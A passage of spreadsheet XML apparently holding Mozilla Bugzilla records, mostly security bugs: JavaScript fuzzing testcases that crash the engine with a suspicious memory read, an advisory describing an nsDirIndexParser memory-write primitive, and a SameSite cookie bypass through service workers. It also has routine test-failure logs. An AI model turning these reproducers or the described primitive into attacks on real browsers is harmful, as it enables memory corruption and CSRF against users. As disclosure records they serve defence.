      <c r="V1055" t="n">
        <v>14</v>
      </c>
      <c r="W1055" t="inlineStr">
        <is>
          <t>Created attachment 569501
stack
a = evalcx("lazy");
b = {}
b.__proto__ = a
a.__proto__ = String
for (var a = 0; a &lt; 50; a++) {
    try {
        b + ""
    } catch (e) {}
}
asserts js debug shell on m-c changeset 6cd262091470 with -m and -j at Assertion failure: script-&gt;code &lt;= pc &amp;&amp; pc &lt; endpc,
A variant,
o9 = evalcx("lazy");
d = {}
d.__proto__ = o9
o9.__proto__ = String.prototype.__proto__;
__proto__.__defineGetter__("toString", function() {})
for (var a = 0; a &lt; 50; a++) {
    try {
        d + ""
    } catch (e) {}
}
asserts js debug shell on m-c changeset 6cd262091470 with -m and -j at Assertion failure: offset &lt; script-&gt;length, and crashes js opt shell at js_GetProperty
Tested on 32-bit Mac 10.6, setting [sg:critical] because a scary memory address, 0x83000005, is being read.
(Ran autoBisect on the second testcase, not sure if it's correct)
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   77143:9ca3d16d575c
parent:      77103:06445f55f009
user:        Brian Hackett
date:        Sat Sep 17 19:14:22 2011 -0700
summary:     [INFER] Reapply c2726640029f 3330521cfa4a b68281262e15 (bug 557358), 6a8947bcc821 (bug 684943), 50d4f6fa00ce (bug 683714), f3dd7cf2d0b3 (bug 683999).</t>
        </is>
      </c>
      <c r="X1055" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" t="n">
        <v>443299</v>
      </c>
      <c r="B1056" t="inlineStr">
        <is>
          <t>2008-07-02 17:31:55 -0700</t>
        </is>
      </c>
      <c r="C1056" t="inlineStr">
        <is>
          <t>Investigate possible buffer overflow in nsDirIndexParser</t>
        </is>
      </c>
      <c r="D1056" t="inlineStr">
        <is>
          <t>2011-05-20 12:49:36 -0700</t>
        </is>
      </c>
      <c r="E1056" t="n">
        <v>1</v>
      </c>
      <c r="F1056" t="n">
        <v>1</v>
      </c>
      <c r="G1056" t="n">
        <v>3</v>
      </c>
      <c r="H1056" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1056" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1056" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K1056" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1056" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1056" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1056" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1056" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1056" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q1056" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1056" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1056" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1056" t="n">
        <v>1</v>
      </c>
      <c r="U1056" t="n">
        <v>0</v>
      </c>
      <c r="V1056" t="n">
        <v>25</v>
      </c>
      <c r="W1056" t="inlineStr">
        <is>
          <t>Created attachment 327894
IBM advisory
Justin Schuh of the IBM X-Force reported the following issue via security@m.o.
The issue appears to require specially-formatted HTTP response headers, so I will send email to the reporter to see if they have a PoC CGI they can provide.
From the advisory:
Summary:
The http-index-format parser does not check for an allocation failure on a format array. The resulting array is then terminated with a sentinel value of 0xFFFFFFFF. A malicious party can exploit this issue to execute arbitrary code by overwriting a sensitive memory location (such as a buffer length or boolean variable).
Details:
When handling a content type of "application/http-index-format", a specially crafted 200 header line in an HTTP index response can result in an exploitable memory corruption condition. The following code fails to check for a NULL pointer returned from a new [] statement (and no exception is thrown). 
netwerk\streamconv\converters\nsDirIndexParser.cpp
lines 203-204
  mFormat = new int[num+1];
  mFormat[num] = -1;
The resulting pointer is then dereferenced by four times the number of tokens provided in the header line, and a 32-bit integer value of -1 (0xFFFFFFFF) is assigned to the dereferenced location.
By manipulating the currently available memory (such as through Javascript) a malicious party can reliably exploit this issue to overwrite an arbitrary memory location with the 4-byte value 0xFFFFFFFF.</t>
        </is>
      </c>
      <c r="X1056" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" t="n">
        <v>1266997</v>
      </c>
      <c r="B1057" t="inlineStr">
        <is>
          <t>2016-04-23 12:33:12 -0700</t>
        </is>
      </c>
      <c r="C1057" t="inlineStr">
        <is>
          <t>browser_rules_completion-new-property_multiline.js is going to permafail on Windows XP when Gecko 48 merges to Aurora</t>
        </is>
      </c>
      <c r="D1057" t="inlineStr">
        <is>
          <t>2018-06-13 10:27:05 -0700</t>
        </is>
      </c>
      <c r="E1057" t="n">
        <v>1</v>
      </c>
      <c r="F1057" t="n">
        <v>1</v>
      </c>
      <c r="G1057" t="n">
        <v>3</v>
      </c>
      <c r="H1057" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1057" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J1057" t="inlineStr">
        <is>
          <t>Inspector</t>
        </is>
      </c>
      <c r="K1057" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1057" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1057" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1057" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1057" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1057" t="inlineStr">
        <is>
          <t>[btpp-fix-now]</t>
        </is>
      </c>
      <c r="Q1057" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1057" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1057" t="inlineStr">
        <is>
          <t>Firefox 49</t>
        </is>
      </c>
      <c r="T1057" t="n">
        <v>1</v>
      </c>
      <c r="U1057" t="n">
        <v>0</v>
      </c>
      <c r="V1057" t="n">
        <v>13</v>
      </c>
      <c r="W1057" t="inlineStr">
        <is>
          <t>Created attachment 8744642
test screenshot
[Tracking Requested - why for this release]: WinXP permafail when Gecko 48 merges to m-c on Monday.
Merge day is on Monday, sorry for missing this earlier.
https://treeherder.mozilla.org/logviewer.html#?job_id=19895063&amp;repo=try
10:34:38     INFO -  98 INFO TEST-START | devtools/client/inspector/rules/test/browser_rules_completion-new-property_multiline.js
10:36:01     INFO -  TEST-INFO | started process screenshot
10:36:01     INFO -  TEST-INFO | screenshot: exit 0
10:36:01     INFO -  99 INFO checking window state
10:36:01     INFO -  100 INFO Entering test bound
10:36:01     INFO -  101 INFO Adding a new tab with URL: data:text/html;charset=utf-8,%3Cstyle%3E%0A%20%20%20%20.title%20%7B%0A%20%20%20%20%20%20background%3A%20transparent%20linear-gradient(0deg%2C%20blue%200%25%2C%20white%205%25%2C%20red%2010%25%2C%20blue%2015%25%2C%20white%2020%25%2C%20red%2025%25%2C%20blue%2030%25%2C%20white%2035%25%2C%20red%2040%25%2C%20blue%2045%25%2C%20white%2050%25%2C%20red%2055%25%2C%20blue%2060%25%2C%20white%2065%25%2C%20red%2070%25%2C%20blue%2075%25%2C%20white%2080%25%2C%20red%2085%25%2C%20blue%2090%25%2C%20white%2095%25%20)%20repeat%20scroll%200%25%200%25%3B%0A%20%20%20%20%7D%0A%20%20%3C%2Fstyle%3E%0A%20%20%3Ch1%20class%3Dtitle%3EHeader%3C%2Fh1%3E
10:36:01     INFO -  102 INFO Waiting for event: 'load' on [object XULElement].
10:36:01     INFO -  103 INFO Got event: 'load' on [object XULElement].
10:36:01     INFO -  104 INFO Tab added and finished loading
10:36:01     INFO -  105 INFO Loading the helper frame script chrome://mochitests/content/browser/devtools/client/inspector/rules/test/doc_frame_script.js
10:36:01     INFO -  106 INFO Opening the inspector
10:36:01     INFO -  107 INFO Opening the toolbox
10:36:01     INFO -  108 INFO Console message: [JavaScript Warning: "Error in parsing value for 'text-anchor'.  Declaration dropped." {file: "resource://devtools/server/actors/highlighters.css" line: 314 column: 15 source: "  text-anchor: left;"}]
10:36:01     INFO -  109 INFO Toolbox opened and focused
10:36:01     INFO -  110 INFO Waiting for the inspector to update
10:36:01     INFO -  111 INFO Selecting the ruleview sidebar
10:36:01     INFO -  112 INFO Selecting the test node
10:36:01     INFO -  113 INFO Selecting the node for 'h1'
10:36:01     INFO -  114 INFO Focusing the property editable field
10:36:01     INFO -  115 INFO Focusing the css property editable value
10:36:01     INFO -  116 INFO Waiting for event: 'focus' on [object HTMLSpanElement].
10:36:01     INFO -  117 INFO Clicking on editable field to turn to edit mode
10:36:01     INFO -  118 INFO Console message: [JavaScript Error: "1461436488382	Toolkit.GMP	ERROR	GMPInstallManager.simpleCheckAndInstall Could not check for addons: Error: got node name: html, expected: updates (resource://gre/modules/addons/ProductAddonChecker.jsm:153:11) JS Stack trace: parseXML@ProductAddonChecker.jsm:153:11 &lt; promise callback*ProductAddonChecker.getProductAddonList@ProductAddonChecker.jsm:320:12 &lt; GMPInstallManager.prototype.checkForAddons@GMPInstallManager.jsm:107:5 &lt; GMPInstallManager.prototype.simpleCheckAndInstall&lt;@GMPInstallManager.jsm:204:29 &lt; gBrowserInit._delayedStartup/&lt;@browser.js:1326:7 &lt; setTimeout handler*gBrowserInit._delayedStartup@browser.js:1322:5 &lt; EventListener.handleEvent*gBrowserInit.onLoad@browser.js:1028:5 &lt; onload@browser.xul:1:1" {file: "resource://gre/modules/Log.jsm" line: 753}]
10:36:01     INFO -  App_append@resource://gre/modules/Log.jsm:753:9
10:36:01     INFO -  Logger.prototype.log@resource://gre/modules/Log.jsm:389:7
10:36:01     INFO -  LoggerRepository.prototype.getLoggerWithMessagePrefix/proxy.log@resource://gre/modules/Log.jsm:504:44
10:36:01     INFO -  Logger.prototype.error@resource://gre/modules/Log.jsm:397:5
10:36:01     INFO -  GMPInstallManager.prototype.simpleCheckAndInstall&lt;@resource://gre/modules/GMPInstallManager.jsm:285:7
10:36:01     INFO -  TaskImpl_run@resource://gre/modules/Task.jsm:320:40
10:36:01     INFO -  Handler.prototype.process@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:940:21
10:36:01     INFO -  this.PromiseWalker.walkerLoop@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:816:7
10:36:01     INFO -  Promise*this.PromiseWalker.scheduleWalkerLoop@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:747:11
10:36:01     INFO -  this.PromiseWalker.schedulePromise@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:779:7
10:36:01     INFO -  this.PromiseWalker.completePromise@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:714:7
10:36:01     INFO -  GMPInstallManager.prototype.checkForAddons/&lt;@resource://gre/modules/GMPInstallManager.jsm:116:7
10:36:01     INFO -  promise callback*GMPInstallManager.prototype.checkForAddons@resource://gre/modules/GMPInstallManager.jsm:107:5
10:36:01     INFO -  GMPInstallManager.prototype.simpleCheckAndInstall&lt;@resource://gre/modules/GMPInstallManager.jsm:204:29
10:36:01     INFO -  TaskImpl_run@resource://gre/modules/Task.jsm:319:40
10:36:01     INFO -  TaskImpl@resource://gre/modules/Task.jsm:280:3
10:36:01     INFO -  createAsyncFunction/asyncFunction@resource://gre/modules/Task.jsm:254:14
10:36:01     INFO -  gBrowserInit._delayedStartup/&lt;@chrome://browser/content/browser.js:1326:7
10:36:01     INFO -  setTimeout handler*gBrowserInit._delayedStartup@chrome://browser/content/browser.js:1322:5
10:36:01     INFO -  EventListener.handleEvent*gBrowserInit.onLoad@chrome://browser/content/browser.js:1028:5
10:36:01     INFO -  onload@chrome://browser/content/browser.xul:1:1
10:36:01     INFO -  119 INFO Console message: [JavaScript Warning: "To play video formats audio/mp4, video/mp4, you need to install extra Microsoft software, see https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows" {file: "chrome://browser/content/browser.xul" line: 0}]
10:36:01     INFO -  120 INFO TEST-UNEXPECTED-FAIL | devtools/client/inspector/rules/test/browser_rules_completion-new-property_multiline.js | Test timed out -
10:36:01     INFO -  MEMORY STAT | vsize 667MB | vsizeMaxContiguous 268MB | residentFast 293MB | heapAllocated 62MB
10:36:01     INFO -  121 INFO TEST-OK | devtools/client/inspector/rules/test/browser_rules_completion-new-property_multiline.js | took 83110ms</t>
        </is>
      </c>
      <c r="X1057" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" t="n">
        <v>700662</v>
      </c>
      <c r="B1058" t="inlineStr">
        <is>
          <t>2011-11-08 07:22:18 -0800</t>
        </is>
      </c>
      <c r="C1058" t="inlineStr">
        <is>
          <t>Fix name for talos-r4-snow-008</t>
        </is>
      </c>
      <c r="D1058" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1058" t="n">
        <v>1</v>
      </c>
      <c r="F1058" t="n">
        <v>1</v>
      </c>
      <c r="G1058" t="n">
        <v>5</v>
      </c>
      <c r="H1058" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1058" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1058" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1058" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1058" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1058" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1058" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1058" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1058" t="inlineStr"/>
      <c r="Q1058" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1058" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1058" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1058" t="n">
        <v>1</v>
      </c>
      <c r="U1058" t="n">
        <v>0</v>
      </c>
      <c r="V1058" t="n">
        <v>2</v>
      </c>
      <c r="W1058" t="inlineStr">
        <is>
          <t>armenzg-laptop $ ssh talos-r4-snow-008.build
Warning: Permanently added 'talos-r4-snow-008.build' (RSA) to the list of known hosts.
Last login: Tue Nov  8 07:06:49 2011 from bm-vpn01.build.sjc1.mozilla.com
Client-Builders-Mac-mini-44:~ cltbld$ uname -a
Darwin Client-Builders-Mac-mini-44.local 10.8.0 Darwin Kernel Version 10.8.0: Tue Jun  7 16:33:36 PDT 2011; root:xnu-1504.15.3~1/RELEASE_I386 i386</t>
        </is>
      </c>
      <c r="X1058" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" t="n">
        <v>1545256</v>
      </c>
      <c r="B1059" t="inlineStr">
        <is>
          <t>2019-04-17 13:54:44 -0700</t>
        </is>
      </c>
      <c r="C1059" t="inlineStr">
        <is>
          <t>Permafailing create interactive task ac(create-inter) HTTPError: 400 Client Error: Bad Request for url: http://taskcluster/queue/v1/task/MsOmu2NoR427QR8759QNcg</t>
        </is>
      </c>
      <c r="D1059" t="inlineStr">
        <is>
          <t>2022-01-10 04:37:16 -0800</t>
        </is>
      </c>
      <c r="E1059" t="n">
        <v>1</v>
      </c>
      <c r="F1059" t="n">
        <v>1</v>
      </c>
      <c r="G1059" t="n">
        <v>7</v>
      </c>
      <c r="H1059" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1059" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J1059" t="inlineStr">
        <is>
          <t>Task Configuration</t>
        </is>
      </c>
      <c r="K1059" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1059" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1059" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1059" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1059" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1059" t="inlineStr"/>
      <c r="Q1059" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R1059" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1059" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T1059" t="n">
        <v>1</v>
      </c>
      <c r="U1059" t="n">
        <v>0</v>
      </c>
      <c r="V1059" t="n">
        <v>11</v>
      </c>
      <c r="W1059" t="inlineStr">
        <is>
          <t>#[markdown(off)]
Filed by: ncsoregi [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=241016540&amp;repo=mozilla-inbound
https://queue.taskcluster.net/v1/task/f5FYTeIdT--7MvxzvlwHlw/runs/0/artifacts/public/logs/live_backing.log
*Example task details:* https://tools.taskcluster.net/groups/YgDcfh93SqWPwR-905WKWg/tasks/H18CvRe1StG7O60ulzodAQ/details
[task 2019-04-17T18:37:01.388Z] Creating task with taskId UIlEmMv-SiW8aAIKkKuquA for test-linux64/debug-marionette-e10s
[task 2019-04-17T18:37:01.671Z] 
[task 2019-04-17T18:37:01.671Z] Schema Validation Failed!
[task 2019-04-17T18:37:01.671Z] Rejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#
[task 2019-04-17T18:37:01.671Z] Errors:
[task 2019-04-17T18:37:01.671Z]   * data.dependencies should NOT have duplicate items (items ## 3 and 0 are identical)
[task 2019-04-17T18:37:01.671Z] 
[task 2019-04-17T18:37:01.671Z] ---
[task 2019-04-17T18:37:01.671Z] 
[task 2019-04-17T18:37:01.671Z] * method:     createTask
[task 2019-04-17T18:37:01.671Z] * errorCode:  InputValidationError
[task 2019-04-17T18:37:01.671Z] * statusCode: 400
[task 2019-04-17T18:37:01.671Z] * time:       2019-04-17T18:37:01.620Z
[task 2019-04-17T18:37:01.672Z] Traceback (most recent call last):
[task 2019-04-17T18:37:01.672Z]   File "/builds/worker/checkouts/gecko/taskcluster/mach_commands.py", line 272, in action_callback
[task 2019-04-17T18:37:01.672Z]     test=False)
[task 2019-04-17T18:37:01.673Z]   File "/builds/worker/checkouts/gecko/taskcluster/taskgraph/actions/registry.py", line 324, in trigger_action_callback
[task 2019-04-17T18:37:01.673Z]     cb(Parameters(**parameters), graph_config, input, task_group_id, task_id)
[task 2019-04-17T18:37:01.673Z]   File "/builds/worker/checkouts/gecko/taskcluster/taskgraph/actions/create_interactive.py", line 152, in create_interactive_action
[task 2019-04-17T18:37:01.673Z]     parameters, modifier=edit)
[task 2019-04-17T18:37:01.673Z]   File "/builds/worker/checkouts/gecko/taskcluster/taskgraph/actions/util.py", line 166, in create_tasks
[task 2019-04-17T18:37:01.673Z]     decision_task_id,
[task 2019-04-17T18:37:01.673Z]   File "/builds/worker/checkouts/gecko/taskcluster/taskgraph/create.py", line 107, in create_tasks
[task 2019-04-17T18:37:01.673Z]     f.result()
[task 2019-04-17T18:37:01.673Z]   File "/builds/worker/checkouts/gecko/third_party/python/futures/concurrent/futures/_base.py", line 398, in result
[task 2019-04-17T18:37:01.673Z]     return self.__get_result()
[task 2019-04-17T18:37:01.673Z]   File "/builds/worker/checkouts/gecko/third_party/python/futures/concurrent/futures/thread.py", line 55, in run
[task 2019-04-17T18:37:01.673Z]     result = self.fn(*self.args, **self.kwargs)
[task 2019-04-17T18:37:01.673Z]   File "/builds/worker/checkouts/gecko/taskcluster/taskgraph/create.py", line 133, in create_task
[task 2019-04-17T18:37:01.673Z]     res.raise_for_status()
[task 2019-04-17T18:37:01.673Z]   File "/builds/worker/checkouts/gecko/third_party/python/requests/requests/models.py", line 840, in raise_for_status
[task 2019-04-17T18:37:01.673Z]     raise HTTPError(http_error_msg, response=self)
[task 2019-04-17T18:37:01.673Z] HTTPError: 400 Client Error: Bad Request for url: http://taskcluster/queue/v1/task/UIlEmMv-SiW8aAIKkKuquA
[taskcluster 2019-04-17 18:37:02.302Z] === Task Finished ===
[taskcluster 2019-04-17 18:37:04.327Z] Unsuccessful task run with exit code: 1 completed in 17.518 seconds</t>
        </is>
      </c>
      <c r="X1059" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" t="n">
        <v>449787</v>
      </c>
      <c r="B1060" t="inlineStr">
        <is>
          <t>2008-08-08 09:46:50 -0700</t>
        </is>
      </c>
      <c r="C1060" t="inlineStr">
        <is>
          <t>Release Notes for Bugzilla 2.22.5</t>
        </is>
      </c>
      <c r="D1060" t="inlineStr">
        <is>
          <t>2008-08-08 09:51:04 -0700</t>
        </is>
      </c>
      <c r="E1060" t="n">
        <v>1</v>
      </c>
      <c r="F1060" t="n">
        <v>1</v>
      </c>
      <c r="G1060" t="n">
        <v>4</v>
      </c>
      <c r="H1060" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1060" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1060" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K1060" t="inlineStr">
        <is>
          <t>2.22.4</t>
        </is>
      </c>
      <c r="L1060" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1060" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1060" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1060" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1060" t="inlineStr"/>
      <c r="Q1060" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1060" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1060" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T1060" t="n">
        <v>1</v>
      </c>
      <c r="U1060" t="n">
        <v>0</v>
      </c>
      <c r="V1060" t="n">
        <v>2</v>
      </c>
      <c r="W1060" t="inlineStr">
        <is>
          <t>Created attachment 332955
v1
2.22.5 is a security-only release, so these were easy.</t>
        </is>
      </c>
      <c r="X1060" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" t="n">
        <v>424188</v>
      </c>
      <c r="B1061" t="inlineStr">
        <is>
          <t>2008-03-20 12:38:15 -0700</t>
        </is>
      </c>
      <c r="C1061" t="inlineStr">
        <is>
          <t>[FIX]Possible to exploit relative xul:script URIs in signed jars</t>
        </is>
      </c>
      <c r="D1061" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1061" t="n">
        <v>1</v>
      </c>
      <c r="F1061" t="n">
        <v>1</v>
      </c>
      <c r="G1061" t="n">
        <v>3</v>
      </c>
      <c r="H1061" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1061" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1061" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1061" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1061" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1061" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1061" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1061" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1061" t="inlineStr">
        <is>
          <t>[sg:high][fixed on branch by 424426]</t>
        </is>
      </c>
      <c r="Q1061" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1061" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1061" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1061" t="n">
        <v>1</v>
      </c>
      <c r="U1061" t="n">
        <v>0</v>
      </c>
      <c r="V1061" t="n">
        <v>15</v>
      </c>
      <c r="W1061" t="inlineStr">
        <is>
          <t>See bug 418996 comment 1 and bug 418996 comment 21.</t>
        </is>
      </c>
      <c r="X1061" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" t="n">
        <v>1658869</v>
      </c>
      <c r="B1062" t="inlineStr">
        <is>
          <t>2020-08-12 23:02:33 -0700</t>
        </is>
      </c>
      <c r="C1062" t="inlineStr">
        <is>
          <t>SameSite policy bypassed with Service Worker FetchEvent</t>
        </is>
      </c>
      <c r="D1062" t="inlineStr">
        <is>
          <t>2024-05-30 10:17:57 -0700</t>
        </is>
      </c>
      <c r="E1062" t="n">
        <v>1</v>
      </c>
      <c r="F1062" t="n">
        <v>1</v>
      </c>
      <c r="G1062" t="n">
        <v>3</v>
      </c>
      <c r="H1062" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1062" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1062" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K1062" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1062" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1062" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1062" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1062" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1062" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][secdom:spec][disclosure at DEFCON 30, to be held in Aug 11-14][post-critsmash-triage][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q1062" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1062" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1062" t="inlineStr">
        <is>
          <t>107 Branch</t>
        </is>
      </c>
      <c r="T1062" t="n">
        <v>1</v>
      </c>
      <c r="U1062" t="n">
        <v>0</v>
      </c>
      <c r="V1062" t="n">
        <v>35</v>
      </c>
      <c r="W1062" t="inlineStr">
        <is>
          <t>Created attachment 9169764
x.jpg
It seems Firefox ignores SameSite policy by sending protected cookies when: a request is intercepted by a service worker FetchEvent, then fired from within its context. As developers willingly opt to implement FetchEvent mainly for caching purposes, this behavior undermines CSRF protection expected from setting up SameSite attribute.
I've set up a simple demo page at https://prong-glory-novel.glitch.me. The site responds with Set-Cookie the "None" "Lax" "Strict" cookies, then echos the Cookie header value in each response. Without a service worker registered, "cross-site page with a link back here" works as expected; "Lax" sent only for GET method, "Strict" not sent for neither GET nor POST. Once the worker registered however, the page will always show all three cookie values sent in the request, indicating SameSite policy is not being enforced.
rfc6265bis 5.2.2.2. states two different scenarios for service workers: 1. Requests which simply pass through a Service Worker, 2. Requests which are initiated by the Service Worker itself. It seems Firefox handles the above case in the latter way, presumably because there is a direct call to fetch() is involved. However, I believe they should be handled in the former way; The worker cannot manipulate the Request object in any way, and all it can do with the object is to hand it over to the network or drop it. In my opinion, it is natural to think the request is actually originated from a top-navigation document, so it should be treated like so.
Tested with 81.0a1 (2020-08-12) (64-bit) on macOS 10.15.6. Cross-reported to Chromium as Chrome exhibits the same behavior. Safari only sends "None" which I suppose is a different problem in itself.
Once thing Firefox-specific pecularity is that Developer Tools _says_ it's sending the right cookies while it is absolutely not. See the attachment.
—
김동성 ᛫ Dongsung Kim ᛫ https://kidi.ng</t>
        </is>
      </c>
      <c r="X1062" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" t="n">
        <v>785470</v>
      </c>
      <c r="B1063" t="inlineStr">
        <is>
          <t>2012-08-24 12:22:32 -0700</t>
        </is>
      </c>
      <c r="C1063" t="inlineStr">
        <is>
          <t>[SECURITY] Missing escaping of the username can lead to LDAP injection</t>
        </is>
      </c>
      <c r="D1063" t="inlineStr">
        <is>
          <t>2012-08-30 13:48:58 -0700</t>
        </is>
      </c>
      <c r="E1063" t="n">
        <v>1</v>
      </c>
      <c r="F1063" t="n">
        <v>1</v>
      </c>
      <c r="G1063" t="n">
        <v>4</v>
      </c>
      <c r="H1063" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1063" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1063" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K1063" t="inlineStr">
        <is>
          <t>2.12</t>
        </is>
      </c>
      <c r="L1063" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1063" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1063" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1063" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1063" t="inlineStr"/>
      <c r="Q1063" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1063" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1063" t="inlineStr">
        <is>
